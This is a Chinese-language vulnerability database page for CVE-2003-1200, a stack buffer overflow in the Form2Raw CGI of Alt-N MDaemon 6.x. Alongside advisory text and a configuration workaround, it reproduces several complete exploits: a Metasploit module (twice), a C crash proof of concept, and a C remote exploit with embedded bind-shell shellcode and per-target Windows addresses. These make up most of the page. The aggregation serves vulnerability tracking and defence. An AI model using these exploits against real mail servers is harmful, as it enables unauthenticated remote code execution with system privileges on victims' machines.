CVE-2003-1200
CVSS7.5
发布时间 :2003-12-29 00:00:00
修订时间 :2016-10-17 22:39:27
NMCOEP    

[原文]Stack-based buffer overflow in FORM2RAW.exe in Alt-N MDaemon 6.5.2 through 6.8.5 allows remote attackers to execute arbitrary code via a long From parameter to Form2Raw.cgi.


[CNNVD]MDaemon Raw Message处理器远程缓冲区溢出漏洞(CNNVD-200312-066)

        
        Alt-N MDaemon是一款基于WEB的邮件服务程序。
        Alt-N MDaemon在Raw消息处理器中存在一个边界错误,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        FORM2RAW.exe是一款CGI程序,允许用户使用MDaemon从WEB上发送EMAIL,在"From"字段发送超过153字节的数据给FORM2Raw.exe,当MDaemon处理建立一个Raw文件时会触发基于栈的缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:alt-n:mdaemon:6.8.0
cpe:/a:alt-n:mdaemon:6.8.1
cpe:/a:alt-n:mdaemon:6.7.5
cpe:/a:alt-n:mdaemon:6.8.4
cpe:/a:alt-n:mdaemon:6.5.2
cpe:/a:alt-n:mdaemon:6.8.2
cpe:/a:alt-n:mdaemon:6.8.5
cpe:/a:alt-n:mdaemon:6.7.9
cpe:/a:alt-n:mdaemon:6.8.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1200
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1200
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-066
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107936753929354&w=2
(UNKNOWN)  BUGTRAQ  20040314 Rosiello Security's exploit for MDaemon
http://www.securityfocus.com/archive/1/348454
(VENDOR_ADVISORY)  BUGTRAQ  20031229 [Hat-Squad] Remote buffer overflow in Mdaemon Raw message Handler
http://www.securityfocus.com/bid/9317
(VENDOR_ADVISORY)  BID  9317
http://xforce.iss.net/xforce/xfdb/14097
(UNKNOWN)  XF  mdaemon-form2raw-from-bo(14097)

- 漏洞信息

MDaemon Raw Message处理器远程缓冲区溢出漏洞
高危 边界条件错误
2003-12-29 00:00:00 2005-10-20 00:00:00
远程  
        
        Alt-N MDaemon是一款基于WEB的邮件服务程序。
        Alt-N MDaemon在Raw消息处理器中存在一个边界错误,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        FORM2RAW.exe是一款CGI程序,允许用户使用MDaemon从WEB上发送EMAIL,在"From"字段发送超过153字节的数据给FORM2Raw.exe,当MDaemon处理建立一个Raw文件时会触发基于栈的缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时关闭FORM2RAW,使用编辑器打开\MDaemon\WorldClient\WorldClient.ini,删除如下两行:
        CgiBase2=/Form2Raw.cgi
        CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
        厂商补丁:
        Alt-N
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.altn.com

- 漏洞信息 (16812)

MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow (EDBID:16812)
windows remote
2010-07-01 Verified
3000 metasploit
N/A [点击下载]
##
# $Id: mdaemon_worldclient_form2raw.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow',
			'Description'	=> %q{
			This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for
			versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),
			a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,
			by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),
			the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based
			overflow occurs when an excessively long From field is specified.
			The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.
			Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.

			Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very
			reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will
			continue to crash/execute the payload until the CGI output is manually deleted
			from the queue in C:\MDaemon\RawFiles\*.raw.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9653 $',
			'References'    =>
			[
				[ 'CVE', '2003-1200' ],
				[ 'OSVDB', '3255' ],
				[ 'BID', '9317' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 900,
					'BadChars' 		=> "\x00\x0a\x0d%\x20@<>&?|,;=`()${}\#!~\"\xff\/\\",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				# Patrickw - Tested OK-ish 20090702 w2k
				[ 'Universal MDaemon.exe', 	{ 'Ret' => 0x022fcd46 } ], # direct memory jump :(
				[ 'Debugging test',		{ 'Ret' => 0x44434241 } ],
			],
			'DisclosureDate' => 'Dec 29 2003',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(3000),
			],self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /WDaemon\/6\.8\.[0-5]/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = "GET /form2raw.cgi?From=" # Trigger vuln
		sploit << "\x90" * 242 # We set EIP to the middle of this.
		sploit << Rex::Arch::X86.jmp_short(61) # Then jump over some junk memory.. 60 is precise but is a badchar.
		sploit << [target['Ret']].pack('V') + "c" # Return address, plus 1 byte overwrite for ESP... 'c'
		sploit << "&To=#{Rex::Text.rand_text_alpha(12)}@#{Rex::Text.rand_text_alpha(12)}.#{Rex::Text.rand_text_alpha(3)}"
		sploit << "&Body=" + "\x90" * 1 # 1 Byte for short jump.
		sploit << payload.encoded + " HTTP/1.0"

		sock.put(sploit + "\r\n\r\n")
		res = sock.get(3,3)

		if (res =~ /Message spooled but will be deleted if not FROM a valid account/)
			print_status("Payload accepted by WorldClient Form2Raw CGI!")
			print_status("Wait for the Raw Queue to be processed (1 to 60 minutes).")
		else
			print_status("Message not accepted. Vulnerable target?")
		end

		handler
		disconnect
	end
end
		

- 漏洞信息 (23501)

Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (1) (EDBID:23501)
windows dos
2003-12-29 Verified
0 Behrang Fouladi
N/A [点击下载]
source: http://www.securityfocus.com/bid/9317/info

It has been reported that MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling certain messages with a 'From' field of over 249 bytes. This issue may allow a remote attacker to gain unauthorized access to a system.

Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the vulnerable software in order to gain unauthorized access.

#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define RET 0x1dff160
#define PORT 3000
void main(int argc, char **argv)
{
     SOCKET s = 0;
     WSADATA wsaData;

    if(argc < 2)
     {
          fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
"\nUsage: %s <target ip> \n", argv[0]);

                  printf("%d",argc);
                       exit(0);
    }

     WSAStartup(MAKEWORD(2,0), &wsaData);

     s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

     if(INVALID_SOCKET != s)
     {
          SOCKADDR_IN anAddr;
          anAddr.sin_family = AF_INET;
          anAddr.sin_port = htons(PORT);
          anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

          if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
          {
               static char buffer[500];
                           int i;
                           memset(buffer,0,sizeof(buffer));
                           strcpy(buffer,"get /form2raw.cgi?From=");
                           for(i=0;i<244;i++) {

                                   strcat(buffer,"a");
                           }

                           strcat(buffer,"bbbb"); //Overwrites EIP
                           strcat(buffer,"c");  //One byte left after ESP :-(
                           strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

                           send(s, buffer, strlen(buffer), 0);
                           printf("Exploit Sent.");

          }

                  else printf("Error Connecting to The Target.\n");
          closesocket(s);
     }

        WSACleanup();
}

		

- 漏洞信息 (23502)

Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (2) (EDBID:23502)
windows remote
2003-12-29 Verified
0 Rosiello Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/9317/info
 
It has been reported that MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling certain messages with a 'From' field of over 249 bytes. This issue may allow a remote attacker to gain unauthorized access to a system.
 
Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the vulnerable software in order to gain unauthorized access.

#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))

#define offset 267 //;267 //1024

// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"


 struct sh_fix
{
 unsigned long _wsasock;
 unsigned long _bind;
 unsigned long _listen;
 unsigned long _accept;
 unsigned long _stdhandle;
 unsigned long _system;
} ;

struct remote_targets {
  char *os;
  unsigned long sh_addr;
  struct sh_fix _sh_fix;
} target [] ={
/* Option`s for your eyes only :D*/
    "Demo                ",
     0x42424242,
    {  0x90909090,
      0x90909090,
      0x90909090,
      0x90909090,
      0x90909090,// <--
      0x90909090,
    },

    "Windows XP HOME [NL]",
     0x014D4DFC,
    {  0x71a35a01,
      0x71a33ece,
      0x71a35de2,
      0x71a3868d,
      0x77e6191d,// <--
      0x77bf8044,
    },

    "Windows XP PRO [NL]",
     0x014D4DFC,
    {  0x71a35a01,
      0x71a33ece,
      0x71a35de2,
      0x71a3868d,
      0x77e6191d,// <--
      0x77bf8044,
    }
};


unsigned char _addy [] =
"\x90\x90\x90\x90";


// 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =

"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";



/* The funny thing is while exploiting this bug one of the adresses
  (see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space) to fix this i wrote
  this addy/mini shellcode tho replace the 0x19 (thats not supposed to be there) in the
  SetStdHandle () adress inside the shellcode for an 0x20.
  */

unsigned char _me [] =
"\x33\xC9"          				//  xor         ecx,ecx
"\xBE\xAA\xAA\xAA\xAA"           	//  mov         esi,offset _shellcode (00421a50)
"\x83\xC1\x1F"         				//  add         ecx,1Fh
"\x41"           					//  inc         ecx
"\x66\x89\x4E\x50"        			//  mov         word ptr [esi+50h],cx
"\xC6\x46\x51\xE6";         		//  mov         byte ptr [esi+51h],0E6h



// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
{
 struct  hostent    *hp;

 if (ISIP(hostname)) return inet_addr(hostname);

  if ((hp = gethostbyname(hostname))==NULL)
  { perror ("[+] gethostbyname() failed check the existance of the host.\n");
    exit(-1); }

  return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
}



int fix_shellcode ( int choise )
{
 unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);


  memcpy(_me+3,((char *)&only_xp),4);


  //0xf offset to the adres of  WSASocketA
  memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);

  //0x30 offset to the adres of bind
  memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);

  //0x3a offset to the adres of listen
  memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);

  //0x46 offset to the adres of _accept
  memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);

  //0x4f offset to the adres of SetStdHandle
  memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);

  //0x6e offset to the adres of SYSTEM
  memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

return 0;

}
/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage (char *what)
{
 int i;

  fprintf(stdout,"Copyright � Rosiello Security\n");
  fprintf(stdout,"http://www.rosiello.org\n\n");
  fprintf(stdout,"Usage %s <target host> <target number>\n",what);
  fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
  fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

  for (i=0;i < 3;i++)
  	fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr);

  exit(0);
}


int main(int argc,char **argv)

{


	char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
	int sd,oops,i,choise;
	struct  sockaddr_in  ooh;


	WSADATA wsadata;
	WSAStartup(0x101, &wsadata);

	if (argc < 2) usage(argv[0]);
	address=argv[1];
	choise=atoi(argv[2]);
	fix_shellcode(choise);

	fprintf(stdout,"[+] Winsock Inalized\n");

 	/* Lets start making a litle setup
    Change the port if you have to */

 	ooh.sin_addr.s_addr = inet_addr(get_ip(address));
    ooh.sin_port        = htons(3000);
    ooh.sin_family      = AF_INET;


	fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);


	// ok ok here`s ur sock()
	sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
 	if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

 	fprintf(stdout,"[+] socket inalized\n");


 	/* inalizing the expploiting buffer read the file comments for the details */
	ptr=buffer+strlen(buffer);

	for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;

	sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
  					((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);





	//memcpy(buffer+35,shellcode,strlen(shellcode));

	fprintf(stdout,"[+] Overflowing string is Prepared\n");

 	// Knock knock ... hi i want to hook up with you
 	oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
  	if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

	// yep wher`e in :D
	fprintf(stdout,"[+] Connected\n");


	// Sending some Dangerous stuff
	i = send(sd,buffer,strlen(buffer),0);
	if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }

	fprintf(stdout,"[+] Overflowing string had been send\n");




	// Bring in the cleaners !!
	WSACleanup();

	// [EOF]
	return 0;

}
		

- 漏洞信息 (F83045)

MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Overflow (PacketStormID:F83045)
2009-11-26 00:00:00
patrick  metasploit.com
exploit,web,overflow,cgi
CVE-2003-1200
[点击下载]

This Metasploit module exploits a stack overflow in Alt-N MDaemon SMTP server for versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default), a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe, by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default), the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based overflow occurs when an excessively long From field is specified. The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes. Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait. Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\\MDaemon\\RawFiles\\*.raw.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Overflow',
			'Description'	=> %q{
			This module exploits a stack overflow in Alt-N MDaemon SMTP server for
			versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),
			a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,
			by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),
			the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based
			overflow occurs when an excessively long From field is specified.
			The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.
			Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.
			
			Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very
			reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will
			continue to crash/execute the payload until the CGI output is manually deleted
			from the queue in C:\MDaemon\RawFiles\*.raw.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2003-1200' ],
				[ 'OSVDB', '3255' ],
				[ 'BID', '9317' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 900,
					'BadChars' 		=> "\x00\x0a\x0d%\x20@<>&?|,;=`()${}\#!~\"\xff\/\\",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				# Patrickw - Tested OK-ish 20090702 w2k
				[ 'Universal MDaemon.exe', 	{ 'Ret' => 0x022fcd46 } ], # direct memory jump :(
				[ 'Debugging test',		{ 'Ret' => 0x44434241 } ],
			],
			'DisclosureDate' => 'Dec 29 2003',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(3000),
			],self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /WDaemon\/6\.8\.[0-5]/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = "GET /form2raw.cgi?From=" # Trigger vuln
		sploit << "\x90" * 242 # We set EIP to the middle of this.
		sploit << Rex::Arch::X86.jmp_short(61) # Then jump over some junk memory.. 60 is precise but is a badchar.
		sploit << [target['Ret']].pack('V') + "c" # Return address, plus 1 byte overwrite for ESP... 'c'
		sploit << "&To=#{Rex::Text.rand_text_alpha(12)}@#{Rex::Text.rand_text_alpha(12)}.#{Rex::Text.rand_text_alpha(3)}"
		sploit << "&Body=" + "\x90" * 1 # 1 Byte for short jump.
		sploit << payload.encoded + " HTTP/1.0"

		sock.put(sploit + "\r\n\r\n")
		res = sock.get(3,3)

		if (res =~ /Message spooled but will be deleted if not FROM a valid account/)
			print_status("Payload accepted by WorldClient Form2Raw CGI!")
			print_status("Wait for the Raw Queue to be processed (1 to 60 minutes).")
		else
			print_status("Message not accepted. Vulnerable target?")
		end

		handler
		disconnect
	end
end
    

- 漏洞信息

3255
MDaemon Form2Raw CGI From Parameter Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Commercial

- 漏洞描述

The MDaemon mail server contains a flaw in a CGI application called 'Form2Raw.exe'. This CGI is used to send raw email messages through the HTTP protocol. A stack overflow condition can be triggered in this application by sending a request which contains a From parameter of more than 153 bytes. This overflow can be exploited remote by an unauthenticated attacker to execute arbitrary code in the context of the MDaemon service (normally LocalSystem).

- 时间线

2003-12-30 2003-12-30
2003-12-29 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Remove the following two lines from the configuration file located at \MDaemon\WorldClient\WorldClient.ini: CgiBase2=/Form2Raw.cgi CgiFile2=C:\MDaemon\CGI\Form2Raw.exe MDaemon must be restarted to activate these changes.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站